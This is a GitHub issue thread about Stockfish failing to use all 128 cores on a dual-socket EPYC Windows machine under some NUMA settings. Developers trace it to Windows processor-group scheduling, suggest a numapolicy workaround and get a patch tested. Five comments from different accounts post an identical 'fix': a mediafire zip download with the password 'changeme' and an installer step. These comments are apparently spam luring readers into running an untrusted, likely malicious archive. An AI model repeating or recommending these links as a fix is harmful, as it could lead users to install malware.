### ISSUE TITLE
NUMA problem on 128 cores

### ISSUE THREAD

**Issue by Rechenschieber** [official-stockfish/Stockfish#5551]
### Describe the issue

I'm running a 128 core dual socket EPYC PC. SMT is on, so there are 256 logical cores.
In case NUMA is switched off  or NUMA is set to 1 NUMA node per socket  running 128 threads does not work properly
![NPS1-128Threads](https://github.com/user-attachments/assets/9bb26359-37ac-4ff5-9714-61c5cf3fdc33)
 

### Expected behavior

All cores should be in use

### Steps to reproduce

setoption name threads value 128
go

### Anything else?

In version 16.1 this problem didn't exist, but running 256 threads with NUMA set to 1 node per socket was faulty

### Operating system

Windows

### Stockfish version

Stockfish dev-20240820

**Comment by Sopel97** [comment]
can you post output of `stockfish.exe setoption name numapolicy value auto`?

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ipmanchess** [comment]
Are all your memory slots filled up with memory banks!

**Comment by Sopel97** [comment]
Alright, so it's indeed not using all cores, but stockfish is binding the threads correctly. It may be due to the OS preferring to run the threads on their main processor group, and since every thread is bound to 128 processors only half of that belongs to the primary group. So in the end this might just be a windows scheduling issue.

As a workaround I suggest running `setoption name numapolicy value 0-63:64-127:128-191:192-255`. For best performance though you should not be overriding the NUMA topology in the BIOS.

**Comment by vondele** [comment]
> We could consider changing the code to force breaking the pools at processor group boundaries on windows to help with this, but ideally this should not be needed and is a little bit of a hack.

would there be an alternative though?

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sopel97** [comment]
> > We could consider changing the code to force breaking the pools at processor group boundaries on windows to help with this, but ideally this should not be needed and is a little bit of a hack.
> 
> would there be an alternative though?

only windows fixing its shit

**Comment by Rechenschieber** [comment]
@Ipmanchess 
yes - this helps performance ;)
@Sopel97
>you should not be overriding the NUMA topology in the BIOS
NPS1 (= 1 NUMA node per socket ) is the default setting of this board.
Why did it work in Stockfish 16.1?

**Comment by Sopel97** [comment]
Because we now bind threads to specific NUMA nodes and replicate large read-only data such that it's always local to the node it's being accessed from. Windows is just a mess with how processor groups and NUMA nodes interact, so edge cases like this pop up from time to time.

**Comment by Rechenschieber** [comment]
>These EPYCs natively have more NUMA nodes, which you can see from the L3 separation in lstopo output. If 1 node per socket is the default then the default is wrong.

I guess you are wrong. This generation of EPYC and also gen 3 + 4 have one I/O die + 8 computing dice. per CPU All RAM channels come from the I/O die, only L3s are separated.
There is a setting named SRAT - this makes each L3 a NUMA node. In EPYCs gen 2 each computing die has 2 computing units with seperate L3s, so you get 32 NUMA nodes with this machine. Gen 3 + 4 only have one L3 per die. With SRAT set, loading hash takes a very long time. Stockfish computing performance isn't bad with this setting, but not top notch.
So NPS1 and SRAT disabled is best - and it is the default setting.

setoption name numapolicy value 0-63:64-127:128-191:192-255 works :)

![iKVM_capture(2)](https://github.com/user-attachments/assets/2321ddeb-dcdb-4355-9030-f5cf888de29b)

**Comment by Sopel97** [comment]
Could you please test https://github.com/official-stockfish/Stockfish/pull/5552?

**Comment by vondele** [comment]
> Could you please test #5552?

@jdp1024 if possible, could you also give it a try if that patch works for you?

**Comment by Sopel97** [comment]
in particular, whether it correctly allocates threads with all the system has, and with half of what the system has (physical cores)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jdp1024** [comment]
> > Could you please test #5552?
> 
> @jdp1024 if possible, could you also give it a try if that patch works for you?

It's more than working: forcing to use old the affinity APIs brings 5% performance boost (122M vs 116M nodes/sec).

EPYC 7763 x 2
Gigabyte MZ72-HB0-00 mainboard
128GB memory, 8GB x 16 slots
NPS = 4
SMT = On
